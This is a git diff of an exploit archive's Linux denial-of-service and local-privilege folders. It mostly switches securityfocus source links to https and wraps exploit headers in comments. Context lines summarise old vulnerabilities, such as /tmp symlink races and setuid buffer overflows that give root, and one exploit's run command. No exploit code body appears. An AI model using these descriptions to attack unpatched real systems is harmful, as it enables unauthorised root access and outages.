a/exploits/linux/dos/34953.txt +++ b/exploits/linux/dos/34953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44623/info +source: https://www.securityfocus.com/bid/44623/info http://www.halfdog.net/Security/FuseTimerace/ FUSE fusermount tool is prone to a race-condition vulnerability. diff --git a/exploits/linux/dos/35013.c b/exploits/linux/dos/35013.c index a3dc5e336..38274f0e7 100644 --- a/exploits/linux/dos/35013.c +++ b/exploits/linux/dos/35013.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/45036/info +source: https://www.securityfocus.com/bid/45036/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/35061.c b/exploits/linux/dos/35061.c index 98d1a4149..baab19eb9 100644 --- a/exploits/linux/dos/35061.c +++ b/exploits/linux/dos/35061.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45233/info +// source: https://www.securityfocus.com/bid/45233/info GNU glibc is prone to a denial-of-service vulnerability due to stack exhaustion. diff --git a/exploits/linux/dos/35162.cob b/exploits/linux/dos/35162.cob index 92d9d8c77..4856bbfc9 100644 --- a/exploits/linux/dos/35162.cob +++ b/exploits/linux/dos/35162.cob @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45647/info +source: https://www.securityfocus.com/bid/45647/info GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input. diff --git a/exploits/linux/dos/35240.c b/exploits/linux/dos/35240.c index 3e5fb073f..805181a69 100644 --- a/exploits/linux/dos/35240.c +++ b/exploits/linux/dos/35240.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45915/info +// source: https://www.securityfocus.com/bid/45915/info The 'acpid' daemon is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/35403.c b/exploits/linux/dos/35403.c index 04ebcb813..29cacd822 100644 --- a/exploits/linux/dos/35403.c +++ b/exploits/linux/dos/35403.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/46630/info +source: https://www.securityfocus.com/bid/46630/info The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/35404.c b/exploits/linux/dos/35404.c index 7f95803e1..68b2b6e02 100644 --- a/exploits/linux/dos/35404.c +++ b/exploits/linux/dos/35404.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/46630/info +source: https://www.securityfocus.com/bid/46630/info The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/35432.txt b/exploits/linux/dos/35432.txt index 977fb3750..35db6d2f0 100644 --- a/exploits/linux/dos/35432.txt +++ b/exploits/linux/dos/35432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46796/info +source: https://www.securityfocus.com/bid/46796/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error. diff --git a/exploits/linux/dos/35445.txt b/exploits/linux/dos/35445.txt index f8fc8ebea..42bed6269 100644 --- a/exploits/linux/dos/35445.txt +++ b/exploits/linux/dos/35445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46831/info +source: https://www.securityfocus.com/bid/46831/info OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command. diff --git a/exploits/linux/dos/35478.txt b/exploits/linux/dos/35478.txt index c7dea8058..e000932f8 100644 --- a/exploits/linux/dos/35478.txt +++ b/exploits/linux/dos/35478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46923/info +source: https://www.securityfocus.com/bid/46923/info MHonArc is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/35600.c b/exploits/linux/dos/35600.c index 12850cbfc..097542861 100644 --- a/exploits/linux/dos/35600.c +++ b/exploits/linux/dos/35600.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/47296/info +source: https://www.securityfocus.com/bid/47296/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/35738.php b/exploits/linux/dos/35738.php index ed35fdce0..db891d2e0 100644 --- a/exploits/linux/dos/35738.php +++ b/exploits/linux/dos/35738.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47820/info +source: https://www.securityfocus.com/bid/47820/info Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition. diff --git a/exploits/linux/dos/35820.c b/exploits/linux/dos/35820.c index f88fe7144..459d699af 100644 --- a/exploits/linux/dos/35820.c +++ b/exploits/linux/dos/35820.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/48101/info +source: https://www.securityfocus.com/bid/48101/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/35957.txt b/exploits/linux/dos/35957.txt index cfd04d64f..4a8c84907 100644 --- a/exploits/linux/dos/35957.txt +++ b/exploits/linux/dos/35957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48687/info +source: https://www.securityfocus.com/bid/48687/info The Auerswald USB Device Driver for the Linux kernel is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/36404.c b/exploits/linux/dos/36404.c index c34a4f969..ae0542b40 100644 --- a/exploits/linux/dos/36404.c +++ b/exploits/linux/dos/36404.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50898/info +// source: https://www.securityfocus.com/bid/50898/info GNU glibc is prone to an remote integer-overflow vulnerability. diff --git a/exploits/linux/dos/36425.txt b/exploits/linux/dos/36425.txt index 12248090f..8382f4af3 100644 --- a/exploits/linux/dos/36425.txt +++ b/exploits/linux/dos/36425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50938/info +source: https://www.securityfocus.com/bid/50938/info The Linux kernel is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/36545.txt b/exploits/linux/dos/36545.txt index 41ba2fbcb..d6133165e 100644 --- a/exploits/linux/dos/36545.txt +++ b/exploits/linux/dos/36545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51389/info +source: https://www.securityfocus.com/bid/51389/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/36633.txt b/exploits/linux/dos/36633.txt index d8854411d..57c70d808 100644 --- a/exploits/linux/dos/36633.txt +++ b/exploits/linux/dos/36633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51710/info +source: https://www.securityfocus.com/bid/51710/info Wireshark is prone to a buffer-underflow vulnerability and multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/36669.txt b/exploits/linux/dos/36669.txt index 321af1351..959cbb9dc 100644 --- a/exploits/linux/dos/36669.txt +++ b/exploits/linux/dos/36669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51917/info +source: https://www.securityfocus.com/bid/51917/info Apache APR is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/37036.txt b/exploits/linux/dos/37036.txt index f4d9e17fb..85a8510fc 100644 --- a/exploits/linux/dos/37036.txt +++ b/exploits/linux/dos/37036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52856/info +source: https://www.securityfocus.com/bid/52856/info Flock is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/37306.txt b/exploits/linux/dos/37306.txt index 97d73c3db..8d121208d 100644 --- a/exploits/linux/dos/37306.txt +++ b/exploits/linux/dos/37306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53646/info +source: https://www.securityfocus.com/bid/53646/info Mosh is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/37477.txt b/exploits/linux/dos/37477.txt index b6d8e804a..59e7e2107 100644 --- a/exploits/linux/dos/37477.txt +++ b/exploits/linux/dos/37477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54281/info +source: https://www.securityfocus.com/bid/54281/info VTE is prone to a vulnerability that may allow attackers to cause an affected application to consume excessive amounts of memory and CPU time, resulting in a denial-of-service condition. diff --git a/exploits/linux/dos/37538.py b/exploits/linux/dos/37538.py index 20ffc6d8f..0e102966c 100755 --- a/exploits/linux/dos/37538.py +++ b/exploits/linux/dos/37538.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54665/info +source: https://www.securityfocus.com/bid/54665/info ISC DHCP is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/37783.c b/exploits/linux/dos/37783.c index 4078f1954..ef67eb01c 100644 --- a/exploits/linux/dos/37783.c +++ b/exploits/linux/dos/37783.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55462/info +// source: https://www.securityfocus.com/bid/55462/info GNU glibc is prone to a remote integer-overflow vulnerability which leads to buffer overflow vulnerability. diff --git a/exploits/linux/dos/37897.html b/exploits/linux/dos/37897.html index b75e819f6..854f899ab 100644 --- a/exploits/linux/dos/37897.html +++ b/exploits/linux/dos/37897.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55709/info +source: https://www.securityfocus.com/bid/55709/info The Midori Browser is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38132.py b/exploits/linux/dos/38132.py index 1fd665ff2..c1c2a8ecc 100755 --- a/exploits/linux/dos/38132.py +++ b/exploits/linux/dos/38132.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56939/info +source: https://www.securityfocus.com/bid/56939/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/38365.txt b/exploits/linux/dos/38365.txt index 7bf85974c..a5a3a51c6 100644 --- a/exploits/linux/dos/38365.txt +++ b/exploits/linux/dos/38365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58319/info +source: https://www.securityfocus.com/bid/58319/info Squid is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38392.txt b/exploits/linux/dos/38392.txt index 9c8564064..ae7bc69ca 100644 --- a/exploits/linux/dos/38392.txt +++ b/exploits/linux/dos/38392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58511/info +source: https://www.securityfocus.com/bid/58511/info MySQL and MariaDB are prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38421.txt b/exploits/linux/dos/38421.txt index 61e3588d0..2e4d41033 100644 --- a/exploits/linux/dos/38421.txt +++ b/exploits/linux/dos/38421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58897/info +source: https://www.securityfocus.com/bid/58897/info Apache Subversion is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38422.txt b/exploits/linux/dos/38422.txt index 05bb8104e..c3228a0ff 100644 --- a/exploits/linux/dos/38422.txt +++ b/exploits/linux/dos/38422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58898/info +source: https://www.securityfocus.com/bid/58898/info Apache Subversion is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38465.txt b/exploits/linux/dos/38465.txt index 557895ea4..cca525245 100644 --- a/exploits/linux/dos/38465.txt +++ b/exploits/linux/dos/38465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59055/info +source: https://www.securityfocus.com/bid/59055/info The Linux kernel is prone to multiple local denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/38589.c b/exploits/linux/dos/38589.c index 9a72f0192..821083e77 100644 --- a/exploits/linux/dos/38589.c +++ b/exploits/linux/dos/38589.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/60586/info +source: https://www.securityfocus.com/bid/60586/info The Linux Kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/38622.txt b/exploits/linux/dos/38622.txt index 1e0c3c55b..6c3f5ee89 100644 --- a/exploits/linux/dos/38622.txt +++ b/exploits/linux/dos/38622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60876/info +source: https://www.securityfocus.com/bid/60876/info libvirt is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38778.txt b/exploits/linux/dos/38778.txt index c4fd959ba..3f21a605f 100644 --- a/exploits/linux/dos/38778.txt +++ b/exploits/linux/dos/38778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62647/info +source: https://www.securityfocus.com/bid/62647/info Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/38854.sh b/exploits/linux/dos/38854.sh index 3b3be25b1..69121a9db 100755 --- a/exploits/linux/dos/38854.sh +++ b/exploits/linux/dos/38854.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64048/info +source: https://www.securityfocus.com/bid/64048/info Net-SNMP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/38909.txt b/exploits/linux/dos/38909.txt index 9994dda54..00efbfe18 100644 --- a/exploits/linux/dos/38909.txt +++ b/exploits/linux/dos/38909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64478/info +source: https://www.securityfocus.com/bid/64478/info DenyHosts is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/40695.c b/exploits/linux/dos/40695.py old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/dos/40695.c rename to exploits/linux/dos/40695.py diff --git a/exploits/linux/dos/40696.c b/exploits/linux/dos/40696.py old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/dos/40696.c rename to exploits/linux/dos/40696.py diff --git a/exploits/linux/dos/40697.c b/exploits/linux/dos/40697.py old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/dos/40697.c rename to exploits/linux/dos/40697.py diff --git a/exploits/linux/dos/41350.c b/exploits/linux/dos/41350.c index 8ea9cac44..e76612a37 100644 --- a/exploits/linux/dos/41350.c +++ b/exploits/linux/dos/41350.c @@ -1,3 +1,4 @@ +/* ##### #Exploit Title: CentOS7 Kernel Crashing by rsyslog daemon vulnerability | DOS on CentOS7 #Exploit Author: Hosein Askari (FarazPajohan) @@ -15,6 +16,8 @@ # ~~~#exploit.out -T3 -h -p [514,514] // You can run this exploit on both "514 TCP/UDP" # #Exploit Code : +*/ + #include #include #include diff --git a/exploits/linux/dos/42932.c b/exploits/linux/dos/42932.c index 7fe1f6812..b793a53c1 100644 --- a/exploits/linux/dos/42932.c +++ b/exploits/linux/dos/42932.c @@ -1,3 +1,4 @@ +/* # Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service # Date: 2017-Oct-02 # Exploit Author: Wang Chenyu (Nanyang Technological University) @@ -13,6 +14,8 @@ nlh->nlmsg_len. POC: +*/ + #include #include #include diff --git a/exploits/linux/dos/45919.c b/exploits/linux/dos/45919.c index 0933b6853..aa31e5f9b 100644 --- a/exploits/linux/dos/45919.c +++ b/exploits/linux/dos/45919.c @@ -1,3 +1,4 @@ +/* # Exploit Title: Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp kernel pointer # Google Dork: - # Date: 2018-11-20 @@ -8,6 +9,7 @@ # Tested on: 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux # CVE: 2017-7558 # Category: Local +*/ /* * [ Briefs ] diff --git a/exploits/linux/dos/7100.pl b/exploits/linux/dos/7100.pl index 98c206369..82c6b77f2 100755 --- a/exploits/linux/dos/7100.pl +++ b/exploits/linux/dos/7100.pl @@ -7,7 +7,7 @@ # # Refer: # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292 -# http://www.securityfocus.com/bid/29212/discuss +# https://www.securityfocus.com/bid/29212/discuss # # # To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w" diff --git a/exploits/linux/local/144.c b/exploits/linux/local/144.c index c0b2c9173..35c31fb44 100644 --- a/exploits/linux/local/144.c +++ b/exploits/linux/local/144.c @@ -1,10 +1,10 @@ - #include - #include - #include +#include +#include +#include - #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." - #define START 1 - #define END 33000 +#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." +#define START 1 +#define END 33000 int main(int argc, char **argv) { diff --git a/exploits/linux/local/15074.sh b/exploits/linux/local/15074.sh index 511c3e0dc..573997652 100755 --- a/exploits/linux/local/15074.sh +++ b/exploits/linux/local/15074.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/43084/info +# source: https://www.securityfocus.com/bid/43084/info #!/bin/sh # by fuzz. For Anux inc. # diff --git a/exploits/linux/local/15344.c b/exploits/linux/local/15344.c index 2eccf6f78..e75d771e5 100644 --- a/exploits/linux/local/15344.c +++ b/exploits/linux/local/15344.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/44242/info +// source: https://www.securityfocus.com/bid/44242/info /* * CVE-2010-2963 * Arbitrary write memory write via v4l1 compat ioctl. diff --git a/exploits/linux/local/19070.txt b/exploits/linux/local/19070.txt index f2e1264cb..447842b5a 100644 --- a/exploits/linux/local/19070.txt +++ b/exploits/linux/local/19070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/77/info +source: https://www.securityfocus.com/bid/77/info liloconfig-color creates the file /tmp/reply insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/reply to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-r--r--. diff --git a/exploits/linux/local/19071.txt b/exploits/linux/local/19071.txt index db5076469..eae68f4b3 100644 --- a/exploits/linux/local/19071.txt +++ b/exploits/linux/local/19071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/78/info +source: https://www.securityfocus.com/bid/78/info makebootdisk creates the file /tmp/return insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/return to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-r--r--. diff --git a/exploits/linux/local/19072.txt b/exploits/linux/local/19072.txt index cd5c0f0c3..4161985ee 100644 --- a/exploits/linux/local/19072.txt +++ b/exploits/linux/local/19072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/80/info +source: https://www.securityfocus.com/bid/80/info The named daemon will dump the named database to /var/tmp/named_dump.db when it receives a SIGINT signal. It does not check for symbolic links while diff --git a/exploits/linux/local/19073.txt b/exploits/linux/local/19073.txt index abc950cdf..8040929c1 100644 --- a/exploits/linux/local/19073.txt +++ b/exploits/linux/local/19073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/81/info +source: https://www.securityfocus.com/bid/81/info netconfig creates the file /tmp/tmpmsg insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/tmpmsg to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-r--r--. diff --git a/exploits/linux/local/19074.txt b/exploits/linux/local/19074.txt index 2e1d174e9..e7a4cc7bc 100644 --- a/exploits/linux/local/19074.txt +++ b/exploits/linux/local/19074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/82/info +source: https://www.securityfocus.com/bid/82/info pkgtool creates the file /tmp/reply insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/reply to any file and wait for root to run the program. This will clober the target file. The file created has permissions -rw-rw-rw-. diff --git a/exploits/linux/local/19077.c b/exploits/linux/local/19077.c index 5cf062a98..7561cebeb 100644 --- a/exploits/linux/local/19077.c +++ b/exploits/linux/local/19077.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/86/info +// source: https://www.securityfocus.com/bid/86/info A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': diff --git a/exploits/linux/local/19078.c b/exploits/linux/local/19078.c index 2a7586a04..deb0c0f4b 100644 --- a/exploits/linux/local/19078.c +++ b/exploits/linux/local/19078.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/86/info +// source: https://www.securityfocus.com/bid/86/info A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c': diff --git a/exploits/linux/local/19080.txt b/exploits/linux/local/19080.txt index 76c699428..e7f4ef2c5 100644 --- a/exploits/linux/local/19080.txt +++ b/exploits/linux/local/19080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/94/info +source: https://www.securityfocus.com/bid/94/info /usr/bin/suidexec will execute arbitrary commands as root, as soon as just _one_ suid root shell script can be found diff --git a/exploits/linux/local/19095.txt b/exploits/linux/local/19095.txt index 9d12b3ec5..46707348d 100644 --- a/exploits/linux/local/19095.txt +++ b/exploits/linux/local/19095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/119/info +source: https://www.securityfocus.com/bid/119/info A vulnerability in bash may allow inadvertently running commands embedded in the path to the currently working directory. diff --git a/exploits/linux/local/19106.c b/exploits/linux/local/19106.c index fe9c2d437..5bab3daa8 100644 --- a/exploits/linux/local/19106.c +++ b/exploits/linux/local/19106.c @@ -1,4 +1,5 @@ -/* source: http://www.securityfocus.com/bid/129/info +/* +source: https://www.securityfocus.com/bid/129/info Rdist is a program to maintain identical copies of files over multiple hosts. It preserves the owner, group, mode, and mtime of files if possible and can update programs that are executing. Rdist reads commands from distfile to direct the updating of files and/or directories. diff --git a/exploits/linux/local/19122.txt b/exploits/linux/local/19122.txt index 07c2d9cdb..bc8c600ba 100644 --- a/exploits/linux/local/19122.txt +++ b/exploits/linux/local/19122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/155/info +source: https://www.securityfocus.com/bid/155/info Due to the way /bin/login behaves when a /etc/group file is not present under Slackware's version of the password shadowing suite, users who log in while this file is not present will be given uid and gid 0. This will allow them unrestricted access to the machine. This vulnerability is present in all versions of Slackware which have shadow passwords, up to and including 3.5 diff --git a/exploits/linux/local/19125.txt b/exploits/linux/local/19125.txt index 20affd5f0..740d434dd 100644 --- a/exploits/linux/local/19125.txt +++ b/exploits/linux/local/19125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/159/info +source: https://www.securityfocus.com/bid/159/info Oracle8 is an enterprise level database. As part of the Internet Agent option installation process it installs the file $ORACLE_HOME/bin/oratclsh as suid root. oratclsh is a TCL application that provides full access to TCL. oratclsh gives anyone the ability to execute arbitrary TCL commands as root. diff --git a/exploits/linux/local/19142.sh b/exploits/linux/local/19142.sh index 17e3347ab..bc8009a65 100755 --- a/exploits/linux/local/19142.sh +++ b/exploits/linux/local/19142.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/170/info +source: https://www.securityfocus.com/bid/170/info A number of security file access security vulnerabilities in suid programs that are part of Oracle may be exploited to obtain the privileges of the 'oracle' user and full access to the database system. Only the Unix version of Oracle is vulnerable. diff --git a/exploits/linux/local/19146.sh b/exploits/linux/local/19146.sh index 8c7cb2ff0..d9b1ff47a 100755 --- a/exploits/linux/local/19146.sh +++ b/exploits/linux/local/19146.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/186/info +#source: https://www.securityfocus.com/bid/186/info # #A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming. diff --git a/exploits/linux/local/19240.c b/exploits/linux/local/19240.c index 70126797c..907fe8ab6 100644 --- a/exploits/linux/local/19240.c +++ b/exploits/linux/local/19240.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/300/info +// source: https://www.securityfocus.com/bid/300/info KMail is a mail user agent that comes with the kdenetwork package, part of the K Desktop Environment. A vulnerability in the way KMail creates temporary files to save attachments may allow malicious users to overwrite any file that user running KMail has permissions to. diff --git a/exploits/linux/local/19243.txt b/exploits/linux/local/19243.txt index d9ece6485..12d023e71 100644 --- a/exploits/linux/local/19243.txt +++ b/exploits/linux/local/19243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/305/info +source: https://www.securityfocus.com/bid/305/info The man command created a temporary file under /tmp with a predictable name and is willing to follow symbolic links. This may allow malicious local users to create arbitrarily named files. diff --git a/exploits/linux/local/19249.c b/exploits/linux/local/19249.c index 15e368321..559911d75 100644 --- a/exploits/linux/local/19249.c +++ b/exploits/linux/local/19249.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/311/info +source: https://www.securityfocus.com/bid/311/info XCmail is an X11 mail client for linux. diff --git a/exploits/linux/local/19254.c b/exploits/linux/local/19254.c index 2f01b9ee8..a26ff7736 100644 --- a/exploits/linux/local/19254.c +++ b/exploits/linux/local/19254.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/319/info +source: https://www.securityfocus.com/bid/319/info Linux gnuplot 3.5 is shipped with S.u.S.E. Linux 5.2 and installed suid root by default. There is a buffer overflow vulnerability present in gnuplot which allows for users to obtain root access locally. */ diff --git a/exploits/linux/local/19255.txt b/exploits/linux/local/19255.txt index 484e6a7ff..50c1811a9 100644 --- a/exploits/linux/local/19255.txt +++ b/exploits/linux/local/19255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/320/info +source: https://www.securityfocus.com/bid/320/info A vulnerability in PAM allows local malicious users to brute force passwords via the su command without any logging of their activity. diff --git a/exploits/linux/local/19256.c b/exploits/linux/local/19256.c index 0583ce979..8a0821ad8 100644 --- a/exploits/linux/local/19256.c +++ b/exploits/linux/local/19256.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/324/info +// source: https://www.securityfocus.com/bid/324/info The netstd package, included with the Debian GNU/Linux distribution is vulnerable to two buffer overflow attacks. The first is in the bootp server, the second in the FTP client. diff --git a/exploits/linux/local/19257.c b/exploits/linux/local/19257.c index 856a2d614..ec1137912 100644 --- a/exploits/linux/local/19257.c +++ b/exploits/linux/local/19257.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/326/info +// source: https://www.securityfocus.com/bid/326/info There is a symlink vulnerability known to exist under most modern linux and NetBSD distributions. It involves /tmp/.X11-unix and the tendency to follow to/overwrite the file pointed to if a symlink. It may be possible for a regular user to write arbritrary data to a file they normally have no write access to resulting in a root compromise. diff --git a/exploits/linux/local/19259.c b/exploits/linux/local/19259.c index a0163e164..7d184e8d3 100644 --- a/exploits/linux/local/19259.c +++ b/exploits/linux/local/19259.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/328/info +// source: https://www.securityfocus.com/bid/328/info The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc version number, you're vulnerable. The consequences of lpc exploitation are root access for a local user. diff --git a/exploits/linux/local/19270.c b/exploits/linux/local/19270.c index d38398a85..a0e8a7398 100644 --- a/exploits/linux/local/19270.c +++ b/exploits/linux/local/19270.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/342/info +// source: https://www.securityfocus.com/bid/342/info // // After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists when the syslog option is enabled. The overflow is in the file error.c, in the Error() function where the buf[MAXPRINT] buffer is used with no bounds checking. The consequences of this are local root compromise. // diff --git a/exploits/linux/local/19279.sh b/exploits/linux/local/19279.sh index d169d8505..65cfc363e 100755 --- a/exploits/linux/local/19279.sh +++ b/exploits/linux/local/19279.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/354/info +source: https://www.securityfocus.com/bid/354/info Abuse is a game that is included with RedHat Linux 2.1 in the games package. The console version, abuse.console, is suid-root and will load the program sndrv as root without checking for an absolute pathname. This means that sndrv can be substituted in another directory by a regular user and used to locally execute arbitrary code on the target machine. Consequences are a root compromise. diff --git a/exploits/linux/local/19281.c b/exploits/linux/local/19281.c index 1cfa84300..43e4232ec 100644 --- a/exploits/linux/local/19281.c +++ b/exploits/linux/local/19281.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/362/info +// source: https://www.securityfocus.com/bid/362/info xosview is an X11 system monitoring application that ships with RedHat 5.1 installed setuid root. A buffer overflow vulnerability was found in Xrm.cc, the offending code listed below: diff --git a/exploits/linux/local/19283.c b/exploits/linux/local/19283.c index 88320375f..bb24799c1 100644 --- a/exploits/linux/local/19283.c +++ b/exploits/linux/local/19283.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/364/info +source: https://www.securityfocus.com/bid/364/info superprobe is an program supplied with XFree86 that helps determine video hardware. It is shipped with Slackware Linux 3.1 and is installed setuid root. There is an exploitable strcpy buffer overflow in the TestChip() function which allows for a trivial local root compromise. */ diff --git a/exploits/linux/local/19284.c b/exploits/linux/local/19284.c index 9b5eb16e4..13bb2e071 100644 --- a/exploits/linux/local/19284.c +++ b/exploits/linux/local/19284.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/365/info +// source: https://www.securityfocus.com/bid/365/info Armidale Software's Yapp Conferencing System is vulnerable to an environment variable related buffer overflow vulnerability in (at least) the Linux version. The consequence of the vulnerability being exploited is a local root compromise. diff --git a/exploits/linux/local/19285.txt b/exploits/linux/local/19285.txt index b9480e69b..94053157f 100644 --- a/exploits/linux/local/19285.txt +++ b/exploits/linux/local/19285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/369/info +source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. diff --git a/exploits/linux/local/19286.c b/exploits/linux/local/19286.c index 38c9dd496..f8f2eaaf3 100644 --- a/exploits/linux/local/19286.c +++ b/exploits/linux/local/19286.c @@ -1,5 +1,5 @@ /* -source: 